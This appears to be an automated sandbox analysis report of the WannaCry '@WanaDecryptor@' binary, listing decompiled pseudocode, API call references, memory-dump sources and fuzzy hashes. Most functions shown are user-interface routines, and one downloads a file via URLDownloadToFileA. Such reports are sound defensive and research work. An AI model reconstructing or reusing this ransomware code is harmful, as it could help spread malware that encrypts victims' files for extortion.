SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C0D5
SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C102
SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C152
SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C189
SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C1C2
SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C1FE

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: MessageSend$#823
String ID:
API String ID: 3019263841-0
Opcode ID: 99a77933eb25dcc6b16ac75c60e27f78d541e8c4006a5acf1c92d05b33b36b85
Instruction ID: af0acaa543f5011fd428c8da5e8f88cfa40878c60dbd15804793c53c70a14286
Opcode Fuzzy Hash: 99a77933eb25dcc6b16ac75c60e27f78d541e8c4006a5acf1c92d05b33b36b85
Instruction Fuzzy Hash: 4A41B570644341EBD220DF65CC85F5BB7A8BF84724F104B2DF5247B2D1C7B4A9098BAA

Uniqueness

Uniqueness Score: -1.00%

Function 00409C20 Relevance: 9.1, APIs: 6, Instructions: 104
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00409C20(signed int __eax, intOrPtr* __ecx, intOrPtr _a4) {
				signed int _v0;
				char _v4;
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				signed int _t29;
				intOrPtr _t31;
				long _t36;
				intOrPtr _t38;
				intOrPtr* _t41;
				struct HWND__* _t47;
				intOrPtr _t48;
				long _t53;
				struct HWND__* _t58;
				signed int _t60;
				intOrPtr* _t67;
				signed int _t68;

				_t67 = __ecx;
				L00412FE6();
				_t68 = __eax;
				if((__eax & 0x00008000) != 0) {
					_push( &_v8);
					_push( &_v4);
					L00412FFE();
					if(_a4 == 0) {
						_t60 = _v0;
						_t41 = _v16;
					} else {
						_t58 =  *(__ecx + 0x20);
						_t36 = SendMessageA(_t58, 0x408, 0, 0);
						_t41 = _v16;
						_t53 = _t36;
						if(_t53 == _t41) {
							_t38 =  *((intOrPtr*)(_t67 + 0x68));
							_t58 =  *(_t67 + 0x6c);
							if(_t53 - _t38 < _t58) {
								_t53 = _t58 + _t38;
							}
						}
						asm("cdq");
						_t60 = (_v0 ^ _t58) - _t58 + _t53;
					}
					_t47 =  *(_t67 + 0x6c);
					_t29 = _t47 + _t41;
					if(_t60 <= _t29) {
						if(_t60 >= _t41) {
							InvalidateRect( *(_t67 + 0x20), 0, 1);
						}
					} else {
						_t60 = _t60 + _v12 - _t47 - _t41;
						if(_t60 > _t29) {
							_t60 = _t29;
						}
						_push(0);
						if((_t68 & 0x00004000) == 0) {
							_push(0x4000);
							_push(0);
							L00412DDC();
						} else {
							_push(0);
							_push(0x4000);
							L00412DDC();
						}
					}
					_t48 = _v12;
					_t31 = _t60 -  *(_t67 + 0x6c);
					 *((intOrPtr*)(_t67 + 0x68)) = _t31;
					if(_t31 < _t48) {
						 *((intOrPtr*)(_t67 + 0x68)) = _t48;
					}
					 *_v16 =  *((intOrPtr*)( *_t67 + 0xa8))(0x402, _t60, 0);
					return 1;
				} else {
					return 0;
				}
			}

APIs

#3797.MFC42 ref: 00409C27
#6734.MFC42(?,?), ref: 00409C4E
SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00409C68
#4284.MFC42(00004000,00000000,00000000,?,?), ref: 00409CCD

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #3797#4284#6734MessageSend
String ID:
API String ID: 1776784669-0
Opcode ID: ed9bba126cbe7da2a4edc66507331a18c8d54c82d452b791da5e82362638f036
Instruction ID: 0f06e6a1ab2a1e1858972f557de936d8f63d8015e647da1bd90f7003a846fc2f
Opcode Fuzzy Hash: ed9bba126cbe7da2a4edc66507331a18c8d54c82d452b791da5e82362638f036
Instruction Fuzzy Hash: 2F31B0727447019BE724DE28DD81B6B73E1ABC8700F10493EFA86A73C1DA78EC468759

Uniqueness

Uniqueness Score: -1.00%

Function 004127E0 Relevance: 9.1, APIs: 6, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E004127E0(signed int __ecx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v4;
				intOrPtr* _v16;
				intOrPtr _v24;
				void* __ebx;
				intOrPtr* _t21;
				intOrPtr* _t23;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t33;
				signed int _t42;
				unsigned int _t44;
				signed int _t45;
				void* _t53;
				intOrPtr _t65;
				void* _t67;
				intOrPtr _t68;
				void* _t69;

				_push(0xffffffff);
				_push(E0041438B);
				_t21 =  *[fs:0x0];
				_push(_t21);
				 *[fs:0x0] = _t68;
				_push(__ecx);
				_push(0x244);
				L00412CEC();
				_t33 = _t21;
				_t69 = _t68 + 4;
				_v16 = _t33;
				_t53 = 0;
				_v4 = 0;
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					_t65 = _a16;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0xffffffff;
					 *((intOrPtr*)(_t33 + 0x134)) = 0xffffffff;
					 *((intOrPtr*)(_t33 + 0x138)) = 0;
					 *((intOrPtr*)(_t33 + 0x13c)) = 0;
					if(_t65 != 0) {
						asm("repne scasb");
						_t42 =  !(__ecx | 0xffffffff);
						_push(_t42);
						L00412CEC();
						 *((intOrPtr*)(_t33 + 0x138)) = 0;
						asm("repne scasb");
						_t44 =  !(_t42 | 0xffffffff);
						_t67 = _t65 - _t44;
						_t45 = _t44 >> 2;
						memcpy(_t67 + _t45 + _t45, _t67, memcpy(0, _t67, _t45 << 2) & 0x00000003);
						_t69 = _t69 + 0x1c;
						_t53 = 0;
					}
				}
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_v4 = 0xffffffff;
				_t23 = E00411C00(_t33);
				 *0x4220dc = _t23;
				if(_t23 == _t53) {
					_push(8);
					L00412CEC();
					 *_t23 = 1;
					 *((intOrPtr*)(_t23 + 4)) = _t33;
					 *[fs:0x0] = _v24;
					return _t23;
				} else {
					if(_t33 != _t53) {
						_t25 =  *((intOrPtr*)(_t33 + 0x138));
						if(_t25 != _t53) {
							_push(_t25);
							L00412C98();
							_t69 = _t69 + 4;
						}
						_t26 =  *((intOrPtr*)(_t33 + 0x13c));
						 *((intOrPtr*)(_t33 + 0x138)) = _t53;
						if(_t26 != _t53) {
							_push(_t26);
							L00412C98();
							_t69 = _t69 + 4;
						}
						_push(_t33);
						 *((intOrPtr*)(_t33 + 0x13c)) = _t53;
						L00412C98();
						_t69 = _t69 + 4;
					}
					 *[fs:0x0] = _v24;
					return 0;
				}
			}

APIs

#823.MFC42(00000244,?,00000428,?,?,0041438B,000000FF,00412933,?,00000000,00000002,?,0040B6CF,?,?), ref: 004127FD
#823.MFC42(?,?,?), ref: 00412849
#825.MFC42(?), ref: 004128B5
#825.MFC42(?), ref: 004128CE
#825.MFC42(00000000), ref: 004128DD
#823.MFC42(00000008), ref: 004128FA

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #823#825
String ID:
API String ID: 89657779-0
Opcode ID: a8225a914fe684002f5ebb33c6b5a83bf5030d8ce9238fcdcecfe8f5a0f25a9a
Instruction ID: dc1b5eec0fc78afcb49772100b5c76d6e8760601cde25cb5382a27e7a1041640
Opcode Fuzzy Hash: a8225a914fe684002f5ebb33c6b5a83bf5030d8ce9238fcdcecfe8f5a0f25a9a
Instruction Fuzzy Hash: 8631A5B16006008BDB149F2E8D8169BB6D5FBC4720F18473EF929CB3C1EBB99951C755

Uniqueness

Uniqueness Score: -1.00%

Function 0040B780 Relevance: 9.1, APIs: 6, Instructions: 68
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E0040B780(signed int __ecx, CHAR* _a4, char* _a8) {
				intOrPtr _v12;
				void _v259;
				char _v260;
				char _v264;
				char _v284;
				char _t15;
				int _t19;
				CHAR* _t25;
				signed int _t26;
				char* _t40;

				_t26 = __ecx;
				_t25 = _a4;
				CreateDirectoryA(_t25, 0);
				_t40 = _a8;
				asm("repne scasb");
				if( !(_t26 | 0xffffffff) == 1) {
					L4:
					return 0;
				} else {
					_t15 =  *0x421798; // 0x0
					_v260 = _t15;
					memset( &_v259, 0, 0x40 << 2);
					asm("stosw");
					asm("stosb");
					GetTempFileNameA(_t25, "t", 0,  &_v260);
					_t19 = DeleteUrlCacheEntry(_t40);
					_push(0);
					_push(0);
					_push( &_v264);
					_push(_t40);
					_push(0);
					L004133CE();
					if(_t19 != 0 || E0040B6A0(_t25,  &_v284, _v12) == 0) {
						DeleteFileA( &_v284);
						goto L4;
					} else {
						DeleteFileA( &_v284);
						return 1;
					}
				}
			}

APIs

CreateDirectoryA.KERNEL32(?,00000000,?,757F3310,00000428), ref: 0040B793
GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
DeleteFileA.KERNEL32(?), ref: 0040B815
DeleteFileA.KERNEL32(?), ref: 0040B82C

Part of subcall function 0040B6A0: CreateDirectoryA.KERNEL32(?,00000000,?,757F3310,00000000,00000428), ref: 0040B6B4
Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: File$Delete$CreateDirectory$CacheDownloadEntryNameTemp
String ID:
API String ID: 361195595-0
Opcode ID: bc206aeca14df8ea71a261a63474c4c6f919be589c915fc96ea8b3c1b6d46284
Instruction ID: f6bba9489874f0a6e7d9c3b0bbe4d647d3eb1ae806ee8fe5932772f512dcd3e1
Opcode Fuzzy Hash: bc206aeca14df8ea71a261a63474c4c6f919be589c915fc96ea8b3c1b6d46284
Instruction Fuzzy Hash: 24112B76100300BBE7209B60DC85FEB379CEBC4321F00C82DF659921D1DB79550987EA

Uniqueness

Uniqueness Score: -1.00%

Function 00409A40 Relevance: 9.1, APIs: 6, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409A40(signed int* _a4, intOrPtr _a8) {
				intOrPtr _v4;
				intOrPtr* _v24;
				struct tagRECT _v40;
				intOrPtr _v56;
				intOrPtr _v64;
				char _v68;
				intOrPtr _v88;
				intOrPtr _t34;
				void* _t35;
				void* _t53;
				intOrPtr _t56;

				 *[fs:0x0] = _t56;
				_v40.right = 0;
				_v40.top = 0x41679c;
				_v4 = 0;
				E00409D40( &(_v40.bottom), _a4, _a8);
				OffsetRect( &_v40,  ~( *_a4),  ~(_a4[1]));
				L00412D5E();
				L00413010();
				_t34 =  *_v24;
				_t35 =  *((intOrPtr*)( *( *_a4) + 0x64))(0, 0, _t34,  *((intOrPtr*)(_t34 - 8)),  &_v68, CreateRectRgn(_v40, _v40.top, _v40.right, _v40.bottom), _t53,  *[fs:0x0], E00414220, 0xffffffff);
				L00412D52();
				_v88 = 0x415c00;
				_v56 = 1;
				L00412D52();
				 *[fs:0x0] = _v64;
				return _t35;
			}

0x00409a4e
0x00409a5d
0x00409a65
0x00409a73
0x00409a82
0x00409a9b
0x00409ac0
0x00409acc
0x00409ad7
0x00409ae4
0x00409aeb
0x00409af0
0x00409afc
0x00409b04
0x00409b0e
0x00409b18

APIs

OffsetRect.USER32(?,?,?), ref: 00409A9B
CreateRectRgn.GDI32(?,?,?,?), ref: 00409AB5
#1641.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220), ref: 00409AC0
#5781.MFC42(0041679C,00000000), ref: 00409ACC
#2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409AEB
#2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409B04

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #2414Rect$#1641#5781CreateOffset
String ID:
API String ID: 2675356817-0
Opcode ID: 70d65907dd93b2958bf6993a897855ede509dea79e6a3755aa7cf1b2bfcc5a2d
Instruction ID: 08eaaa51a6c0e03944d0349f6c05153d0be232de021c7e29130ffbf32961e4dd
Opcode Fuzzy Hash: 70d65907dd93b2958bf6993a897855ede509dea79e6a3755aa7cf1b2bfcc5a2d
Instruction Fuzzy Hash: 7621E9B5204701AFD304DF14C995FABB7E8EB88B04F108A1DF58697291CB78EC45CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004034A0 Relevance: 9.1, APIs: 6, Instructions: 56
windowCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E004034A0(void* __ecx) {
				intOrPtr _v0;
				int _v8;
				struct tagRECT _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v72;
				char* _t20;
				int _t23;
				void* _t45;
				intOrPtr _t48;

				_push(0xffffffff);
				_push(E00413620);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t48;
				_t45 = __ecx;
				GetClientRect( *(__ecx + 0x20),  &_v28);
				_push( *((intOrPtr*)(_t45 + 0xe8)));
				L00412D76();
				_t20 =  &_v40;
				_push(_t20);
				_v8 = 0;
				L00412D70();
				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
				_push(_t20);
				L00412D70();
				_v72 = 0x415c00;
				_v40 = 1;
				L00412D52();
				 *[fs:0x0] = _v48;
				return _t23;
			}

APIs

GetClientRect.USER32(?,?), ref: 004034C6
#283.MFC42(?), ref: 004034D7
#5789.MFC42 ref: 004034EF
PatBlt.GDI32(?,00000000,00000000,?,?,00F00021), ref: 00403519
#5789.MFC42(00000000), ref: 00403524
#2414.MFC42(00000000), ref: 0040353D

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #5789$#2414#283ClientRect
String ID:
API String ID: 3728838672-0
Opcode ID: e98b5bf81114f17ba521e4ef3fa09cb8d98efe28b03220bb61ec6d1cf8ad346c
Instruction ID: 278ac0b80a8d68711b6ced8a2ef72b48c78586c4dd5442d856e74ad00dc42751
Opcode Fuzzy Hash: e98b5bf81114f17ba521e4ef3fa09cb8d98efe28b03220bb61ec6d1cf8ad346c
Instruction Fuzzy Hash: DB113375204741AFC314DF69D985F9BB7E8FB88714F008A1EB55AD3280DB78E8448B55

Uniqueness

Uniqueness Score: -1.00%

Function 00406940 Relevance: 9.1, APIs: 6, Instructions: 56
windowCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00406940(void* __ecx) {
				intOrPtr _v0;
				int _v8;
				struct tagRECT _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v72;
				char* _t20;
				int _t23;
				void* _t45;
				intOrPtr _t48;

				_push(0xffffffff);
				_push(E00413E30);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t48;
				_t45 = __ecx;
				GetClientRect( *(__ecx + 0x20),  &_v28);
				_push( *((intOrPtr*)(_t45 + 0x824)));
				L00412D76();
				_t20 =  &_v40;
				_push(_t20);
				_v8 = 0;
				L00412D70();
				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
				_push(_t20);
				L00412D70();
				_v72 = 0x415c00;
				_v40 = 1;
				L00412D52();
				 *[fs:0x0] = _v48;
				return _t23;
			}

APIs

GetClientRect.USER32(?,?), ref: 00406966
#283.MFC42(?), ref: 00406977
#5789.MFC42 ref: 0040698F
PatBlt.GDI32(?,00000000,00000000,?,?,00F00021), ref: 004069B9
#5789.MFC42(00000000), ref: 004069C4
#2414.MFC42(00000000), ref: 004069DD

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #5789$#2414#283ClientRect
String ID:
API String ID: 3728838672-0
Opcode ID: 94bfcdd95dccd0665c65ca55dcb9de4da2bf1fb5487f65770e6e71c06e885f3f
Instruction ID: 6a096d29dde81ab0807628e72033e91f5df492254ff76bbe7bc423a6b66a9ecc
Opcode Fuzzy Hash: 94bfcdd95dccd0665c65ca55dcb9de4da2bf1fb5487f65770e6e71c06e885f3f
Instruction Fuzzy Hash: CB113375204741AFC314DF69D985F9BB7E8FB8C714F008A1EB599D3280DB78D8058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00404EB0 Relevance: 9.1, APIs: 6, Instructions: 56
windowCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00404EB0(void* __ecx) {
				intOrPtr _v0;
				int _v8;
				struct tagRECT _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v72;
				char* _t20;
				int _t23;
				void* _t45;
				intOrPtr _t48;

				_push(0xffffffff);
				_push(E00413870);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t48;
				_t45 = __ecx;
				GetClientRect( *(__ecx + 0x20),  &_v28);
				_push( *((intOrPtr*)(_t45 + 0x6c)));
				L00412D76();
				_t20 =  &_v40;
				_push(_t20);
				_v8 = 0;
				L00412D70();
				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
				_push(_t20);
				L00412D70();
				_v72 = 0x415c00;
				_v40 = 1;
				L00412D52();
				 *[fs:0x0] = _v48;
				return _t23;
			}

APIs

GetClientRect.USER32(?,?), ref: 00404ED6
#283.MFC42(?), ref: 00404EE4
#5789.MFC42 ref: 00404EFC
PatBlt.GDI32(?,00000000,00000000,?,?,00F00021), ref: 00404F26
#5789.MFC42(00000000), ref: 00404F31
#2414.MFC42(00000000), ref: 00404F4A

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #5789$#2414#283ClientRect
String ID:
API String ID: 3728838672-0
Opcode ID: 46ba31fa0516e8aa439e01c94c41dc17825091199510f8b9dc900171e6d2ebb4
Instruction ID: d163b7983d6ef18c2c490a4321b6073019a727c2a72f1ecd8d9e2d5251008e6b
Opcode Fuzzy Hash: 46ba31fa0516e8aa439e01c94c41dc17825091199510f8b9dc900171e6d2ebb4
Instruction Fuzzy Hash: CB113375204701AFC314DF69D985F9BB7E8FB88714F008A1EB599D3280DB78D8058B55

Uniqueness

Uniqueness Score: -1.00%

Function 00404310 Relevance: 9.1, APIs: 6, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00404310(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _v40;
				intOrPtr _v48;
				void* _v96;
				void* _v100;
				void* _v104;
				void* _v108;
				intOrPtr _v112;
				void* _v128;
				void* _v132;
				void* _t20;
				void* _t22;
				void* _t39;
				intOrPtr _t40;
				intOrPtr _t42;

				_push(0xffffffff);
				_push(E004137A8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t42;
				_t39 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
					E004044C0(__ecx, 0);
				}
				L00412DD0();
				_t20 = _t39 + 0x48;
				_v8 = 0;
				L00412DCA();
				L00412DC4();
				L00412DBE();
				_t40 =  *((intOrPtr*)(_t39 + 0x40));
				_t22 =  *((intOrPtr*)(_v112 + 0x64))(0, 0, _t40,  *((intOrPtr*)(_t40 - 8)),  *((intOrPtr*)(_t39 + 0x64)), 1, _t20, _t39);
				_push(_t20);
				L00412DCA();
				_v40 = 0xffffffff;
				L00412DB8();
				 *[fs:0x0] = _v48;
				return _t22;
			}

APIs

#470.MFC42(?,00000000), ref: 0040433F
#5789.MFC42 ref: 00404354
#5875.MFC42(00000001), ref: 00404361
#6172.MFC42(?,00000001), ref: 0040436E
#5789.MFC42(00000000), ref: 0040438F
#755.MFC42(00000000), ref: 004043A0

Part of subcall function 004044C0: GetParent.USER32(?), ref: 004044D2
Part of subcall function 004044C0: #2864.MFC42(00000000), ref: 004044D9
Part of subcall function 004044C0: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
Part of subcall function 004044C0: #2860.MFC42(00000000), ref: 004044EF
Part of subcall function 004044C0: GetObjectA.GDI32(?,0000003C,?), ref: 00404503
Part of subcall function 004044C0: CreateFontIndirectA.GDI32(?), ref: 00404513
Part of subcall function 004044C0: #1641.MFC42(00000000), ref: 0040451D

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #5789$#1641#2860#2864#470#5875#6172#755CreateFontIndirectMessageObjectParentSend
String ID:
API String ID: 3301245081-0
Opcode ID: fc0b145fd5a230e1fb0a5d7e30a8fbc0e65b4b60cc0ead88fd739261a0b8085f
Instruction ID: 67bcf298962d36d7fa18f20cd84a87d7b1dd540c5c31f1d51ecab4020f7c2e08
Opcode Fuzzy Hash: fc0b145fd5a230e1fb0a5d7e30a8fbc0e65b4b60cc0ead88fd739261a0b8085f
Instruction Fuzzy Hash: 4611CE71104300AFC310EF14D841FDAB7A4EF94724F008A1EF5A6932D0CBB8A484CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00403EB0 Relevance: 9.0, APIs: 6, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00403EB0(void* __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr _t9;

				_t9 = _a4;
				_push(_t9);
				_push(0x407);
				L00412CE6();
				L00412D88();
				_push(_t9);
				_push(0x408);
				L00412CE6();
				L00412D88();
				_push(_t9);
				_push(2);
				L00412CE6();
				L00412D88();
				return __eax;
			}

0x00403eb2
0x00403eb8
0x00403eb9
0x00403ebe
0x00403ec5
0x00403eca
0x00403ecb
0x00403ed2
0x00403ed9
0x00403ede
0x00403edf
0x00403ee3
0x00403eea
0x00403ef1

APIs

#3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
#2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
#3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
#2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
#3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
#2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #2642#3092
String ID:
API String ID: 2547810013-0
Opcode ID: e7ddd79a8d322918c2dba81477a0c723ed6b3b7cf26a0e59a3b85b9555a4b9c5
Instruction ID: 4bb7b71439f2442b6829c2e1ec9f7e71f44d4abaae38a5a684cddd693ffb540b
Opcode Fuzzy Hash: e7ddd79a8d322918c2dba81477a0c723ed6b3b7cf26a0e59a3b85b9555a4b9c5
